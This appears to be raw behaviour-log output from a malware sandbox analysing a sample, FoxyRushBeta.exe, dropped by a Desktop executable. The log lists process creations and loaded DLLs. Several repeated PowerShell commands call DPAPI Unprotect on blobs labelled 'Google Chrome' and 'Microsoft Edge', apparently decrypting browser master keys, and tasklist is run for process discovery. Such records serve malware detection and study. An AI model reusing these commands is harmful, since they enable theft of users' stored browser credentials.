Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,133,249,150,31,215,133,122,74,160,83,200,231,85,194,93,57,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,220,99,52,70,203,13,214,237,172,78,180,7,135,132,222,56,192,222,60,122,2,71,120,79,2,110,200,30,117,75,45,64,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,84,96,129,36,148,225,154,120,74,75,125,156,249,147,149,248,25,11,154,223,250,69,31,112,70,8,1,93,107,120,136,224,48,0,0,0,6,45,27,130,158,227,72,112,46,16,20,247,121,185,158,95,106,75,104,237,172,49,168,214,157,137,66,208,86,220,45,252,169,85,86,184,103,83,137,130,133,35,244,129,44,127,163,72,64,0,0,0,35,18,109,136,80,52,198,238,200,236,226,120,27,146,160,174,71,84,66,203,39,169,215,160,227,44,242,154,161,64,187,142,165,157,66,1,229,116,228,177,236,99,223,240,230,79,21,58,53,251,1,129,235,77,36,48,152,174,95,142,72,93,217,72), $null, 'CurrentUser')"
Source: C:\Windows\System32\cmd.exe  Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe  Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,133,249,150,31,215,133,122,74,160,83,200,231,85,194,93,57,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,220,99,52,70,203,13,214,237,172,78,180,7,135,132,222,56,192,222,60,122,2,71,120,79,2,110,200,30,117,75,45,64,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,84,96,129,36,148,225,154,120,74,75,125,156,249,147,149,248,25,11,154,223,250,69,31,112,70,8,1,93,107,120,136,224,48,0,0,0,6,45,27,130,158,227,72,112,46,16,20,247,121,185,158,95,106,75,104,237,172,49,168,214,157,137,66,208,86,220,45,252,169,85,86,184,103,83,137,130,133,35,244,129,44,127,163,72,64,0,0,0,35,18,109,136,80,52,198,238,200,236,226,120,27,146,160,174,71,84,66,203,39,169,215,160,227,44,242,154,161,64,187,142,165,157,66,1,229,116,228,177,236,99,223,240,230,79,21,58,53,251,1,129,235,77,36,48,152,174,95,142,72,93,217,72), $null, 'CurrentUser')
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe  Process created: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe "C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --user-data-dir="C:\Users\user\AppData\Roaming\FoxyRushBeta" --field-trial-handle=2528,i,1504465930611205923,3791245271316318440,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand --variations-seed-version --mojo-platform-channel-handle=2524 /prefetch:3
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe  Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,133,249,150,31,215,133,122,74,160,83,200,231,85,194,93,57,16,0,0,0,30,0,0,0,77,0,105,0,99,0,114,0,111,0,115,0,111,0,102,0,116,0,32,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,14,53,24,103,59,147,206,28,42,108,2,171,66,248,59,252,178,162,35,232,127,115,109,155,94,76,82,107,203,163,4,197,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,102,39,139,236,68,70,39,152,67,111,123,34,177,197,103,181,124,213,190,112,13,193,185,90,191,194,52,69,126,126,90,70,48,0,0,0,78,43,108,139,184,233,18,30,79,160,62,90,54,145,175,184,1,206,218,146,139,219,218,40,3,209,83,56,71,210,79,189,120,174,46,157,101,81,201,76,77,181,151,119,46,253,183,146,64,0,0,0,25,132,83,220,77,72,234,147,112,233,192,145,190,240,42,192,38,154,220,71,203,164,145,111,115,55,19,193,38,168,21,189,120,226,128,178,203,174,136,16,121,184,133,15,28,247,227,66,0,254,38,112,15,247,17,81,12,63,142,85,32,243,79,251), $null, 'CurrentUser')"
Source: C:\Windows\System32\cmd.exe  Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe  Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,133,249,150,31,215,133,122,74,160,83,200,231,85,194,93,57,16,0,0,0,30,0,0,0,77,0,105,0,99,0,114,0,111,0,115,0,111,0,102,0,116,0,32,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,14,53,24,103,59,147,206,28,42,108,2,171,66,248,59,252,178,162,35,232,127,115,109,155,94,76,82,107,203,163,4,197,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,102,39,139,236,68,70,39,152,67,111,123,34,177,197,103,181,124,213,190,112,13,193,185,90,191,194,52,69,126,126,90,70,48,0,0,0,78,43,108,139,184,233,18,30,79,160,62,90,54,145,175,184,1,206,218,146,139,219,218,40,3,209,83,56,71,210,79,189,120,174,46,157,101,81,201,76,77,181,151,119,46,253,183,146,64,0,0,0,25,132,83,220,77,72,234,147,112,233,192,145,190,240,42,192,38,154,220,71,203,164,145,111,115,55,19,193,38,168,21,189,120,226,128,178,203,174,136,16,121,184,133,15,28,247,227,66,0,254,38,112,15,247,17,81,12,63,142,85,32,243,79,251), $null, 'CurrentUser')
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe  Process created: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe "C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --user-data-dir="C:\Users\user\AppData\Roaming\FoxyRushBeta" --field-trial-handle=2524,i,1504465930611205923,3791245271316318440,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand --variations-seed-version --mojo-platform-channel-handle=2520 /prefetch:3
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe  Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"
Source: C:\Windows\System32\cmd.exe  Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe  Process created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe  Process created: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe "C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=32902 --gpu-device-id=32069 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --user-data-dir="C:\Users\user\AppData\Roaming\FoxyRushBeta" --gpu-preferences=UAAAAAAAAADoAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAABCAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=2644,i,1504465930611205923,3791245271316318440,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand --variations-seed-version --mojo-platform-channel-handle=1296 /prefetch:8
Source: C:\Users\user\Desktop\bkHLzNaNMS.exe  Process created: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe  Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe  Process created: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe "C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe" --type=gpu-process --user-data-dir="C:\Users\user\AppData\Roaming\FoxyRushBeta" --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=1908,i,1504465930611205923,3791245271316318440,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand --variations-seed-version --mojo-platform-channel-handle=1900 /prefetch:2
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe  Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,133,249,150,31,215,133,122,74,160,83,200,231,85,194,93,57,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,220,99,52,70,203,13,214,237,172,78,180,7,135,132,222,56,192,222,60,122,2,71,120,79,2,110,200,30,117,75,45,64,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,84,96,129,36,148,225,154,120,74,75,125,156,249,147,149,248,25,11,154,223,250,69,31,112,70,8,1,93,107,120,136,224,48,0,0,0,6,45,27,130,158,227,72,112,46,16,20,247,121,185,158,95,106,75,104,237,172,49,168,214,157,137,66,208,86,220,45,252,169,85,86,184,103,83,137,130,133,35,244,129,44,127,163,72,64,0,0,0,35,18,109,136,80,52,198,238,200,236,226,120,27,146,160,174,71,84,66,203,39,169,215,160,227,44,242,154,161,64,187,142,165,157,66,1,229,116,228,177,236,99,223,240,230,79,21,58,53,251,1,129,235,77,36,48,152,174,95,142,72,93,217,72), $null, 'CurrentUser')"
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe  Process created: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe "C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --user-data-dir="C:\Users\user\AppData\Roaming\FoxyRushBeta" --field-trial-handle=2528,i,1504465930611205923,3791245271316318440,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand --variations-seed-version --mojo-platform-channel-handle=2524 /prefetch:3
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe  Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,133,249,150,31,215,133,122,74,160,83,200,231,85,194,93,57,16,0,0,0,30,0,0,0,77,0,105,0,99,0,114,0,111,0,115,0,111,0,102,0,116,0,32,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,14,53,24,103,59,147,206,28,42,108,2,171,66,248,59,252,178,162,35,232,127,115,109,155,94,76,82,107,203,163,4,197,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,102,39,139,236,68,70,39,152,67,111,123,34,177,197,103,181,124,213,190,112,13,193,185,90,191,194,52,69,126,126,90,70,48,0,0,0,78,43,108,139,184,233,18,30,79,160,62,90,54,145,175,184,1,206,218,146,139,219,218,40,3,209,83,56,71,210,79,189,120,174,46,157,101,81,201,76,77,181,151,119,46,253,183,146,64,0,0,0,25,132,83,220,77,72,234,147,112,233,192,145,190,240,42,192,38,154,220,71,203,164,145,111,115,55,19,193,38,168,21,189,120,226,128,178,203,174,136,16,121,184,133,15,28,247,227,66,0,254,38,112,15,247,17,81,12,63,142,85,32,243,79,251), $null, 'CurrentUser')"
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe  Process created: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe "C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --user-data-dir="C:\Users\user\AppData\Roaming\FoxyRushBeta" --field-trial-handle=2524,i,1504465930611205923,3791245271316318440,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand --variations-seed-version --mojo-platform-channel-handle=2520 /prefetch:3
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe  Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe  Process created: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe "C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=32902 --gpu-device-id=32069 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --user-data-dir="C:\Users\user\AppData\Roaming\FoxyRushBeta" --gpu-preferences=UAAAAAAAAADoAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAABCAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=2644,i,1504465930611205923,3791245271316318440,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand --variations-seed-version --mojo-platform-channel-handle=1296 /prefetch:8
Source: C:\Windows\System32\cmd.exe  Process created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Windows\System32\cmd.exe  Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,133,249,150,31,215,133,122,74,160,83,200,231,85,194,93,57,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,220,99,52,70,203,13,214,237,172,78,180,7,135,132,222,56,192,222,60,122,2,71,120,79,2,110,200,30,117,75,45,64,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,84,96,129,36,148,225,154,120,74,75,125,156,249,147,149,248,25,11,154,223,250,69,31,112,70,8,1,93,107,120,136,224,48,0,0,0,6,45,27,130,158,227,72,112,46,16,20,247,121,185,158,95,106,75,104,237,172,49,168,214,157,137,66,208,86,220,45,252,169,85,86,184,103,83,137,130,133,35,244,129,44,127,163,72,64,0,0,0,35,18,109,136,80,52,198,238,200,236,226,120,27,146,160,174,71,84,66,203,39,169,215,160,227,44,242,154,161,64,187,142,165,157,66,1,229,116,228,177,236,99,223,240,230,79,21,58,53,251,1,129,235,77,36,48,152,174,95,142,72,93,217,72), $null, 'CurrentUser')
Source: C:\Windows\System32\cmd.exe  Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,133,249,150,31,215,133,122,74,160,83,200,231,85,194,93,57,16,0,0,0,30,0,0,0,77,0,105,0,99,0,114,0,111,0,115,0,111,0,102,0,116,0,32,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,14,53,24,103,59,147,206,28,42,108,2,171,66,248,59,252,178,162,35,232,127,115,109,155,94,76,82,107,203,163,4,197,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,102,39,139,236,68,70,39,152,67,111,123,34,177,197,103,181,124,213,190,112,13,193,185,90,191,194,52,69,126,126,90,70,48,0,0,0,78,43,108,139,184,233,18,30,79,160,62,90,54,145,175,184,1,206,218,146,139,219,218,40,3,209,83,56,71,210,79,189,120,174,46,157,101,81,201,76,77,181,151,119,46,253,183,146,64,0,0,0,25,132,83,220,77,72,234,147,112,233,192,145,190,240,42,192,38,154,220,71,203,164,145,111,115,55,19,193,38,168,21,189,120,226,128,178,203,174,136,16,121,184,133,15,28,247,227,66,0,254,38,112,15,247,17,81,12,63,142,85,32,243,79,251), $null, 'CurrentUser')
Source: C:\Windows\System32\cmd.exe  Process created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Users\user\Desktop\bkHLzNaNMS.exe  Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\bkHLzNaNMS.exe  Section loaded: userenv.dll
Source: C:\Users\user\Desktop\bkHLzNaNMS.exe  Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\bkHLzNaNMS.exe  Section loaded: propsys.dll
Source: C:\Users\user\Desktop\bkHLzNaNMS.exe  Section loaded: dwmapi.dll
Source: C:\Users\user\Desktop\bkHLzNaNMS.exe  Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\bkHLzNaNMS.exe  Section loaded: oleacc.dll
Source: C:\Users\user\Desktop\bkHLzNaNMS.exe  Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\bkHLzNaNMS.exe  Section loaded: version.dll
Source: C:\Users\user\Desktop\bkHLzNaNMS.exe  Section loaded: shfolder.dll
Source: C:\Users\user\Desktop\bkHLzNaNMS.exe  Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\bkHLzNaNMS.exe  Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\bkHLzNaNMS.exe  Section loaded: wldp.dll
Source: C:\Users\user\Desktop\bkHLzNaNMS.exe  Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\bkHLzNaNMS.exe  Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\bkHLzNaNMS.exe  Section loaded: windows.fileexplorer.common.dll
Source: C:\Users\user\Desktop\bkHLzNaNMS.exe  Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\bkHLzNaNMS.exe  Section loaded: ntshrui.dll
Source: C:\Users\user\Desktop\bkHLzNaNMS.exe  Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\bkHLzNaNMS.exe  Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe  Section loaded: ffmpeg.dll
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe  Section loaded: dbghelp.dll
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe  Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe  Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe  Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe  Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe  Section loaded: dwrite.dll
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe  Section loaded: secur32.dll
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe  Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe  Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe  Section loaded: dbgcore.dll
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe  Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe  Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe  Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe  Section loaded: powrprof.dll
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe  Section loaded: umpdc.dll
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe  Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe  Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe  Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe  Section loaded: kbdus.dll
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe  Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe  Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe  Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe  Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe  Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe  Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe  Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe  Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe  Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe  Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe  Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe  Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe  Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe  Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe  Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe  Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe  Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe  Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe  Section loaded: windows.ui.dll
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe  Section loaded: windowmanagementapi.dll
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe  Section loaded: inputhost.dll
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe  Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe  Section loaded: twinapi.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe  Section loaded: twinapi.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe  Section loaded: wtsapi32.dll
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe  Section loaded: winsta.dll
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe  Section loaded: mmdevapi.dll
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe  Section loaded: devobj.dll
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe  Section loaded: mscms.dll
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe  Section loaded: coloradapterclient.dll
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe  Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe  Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe  Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe  Section loaded: netprofm.dll
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe  Section loaded: npmproxy.dll
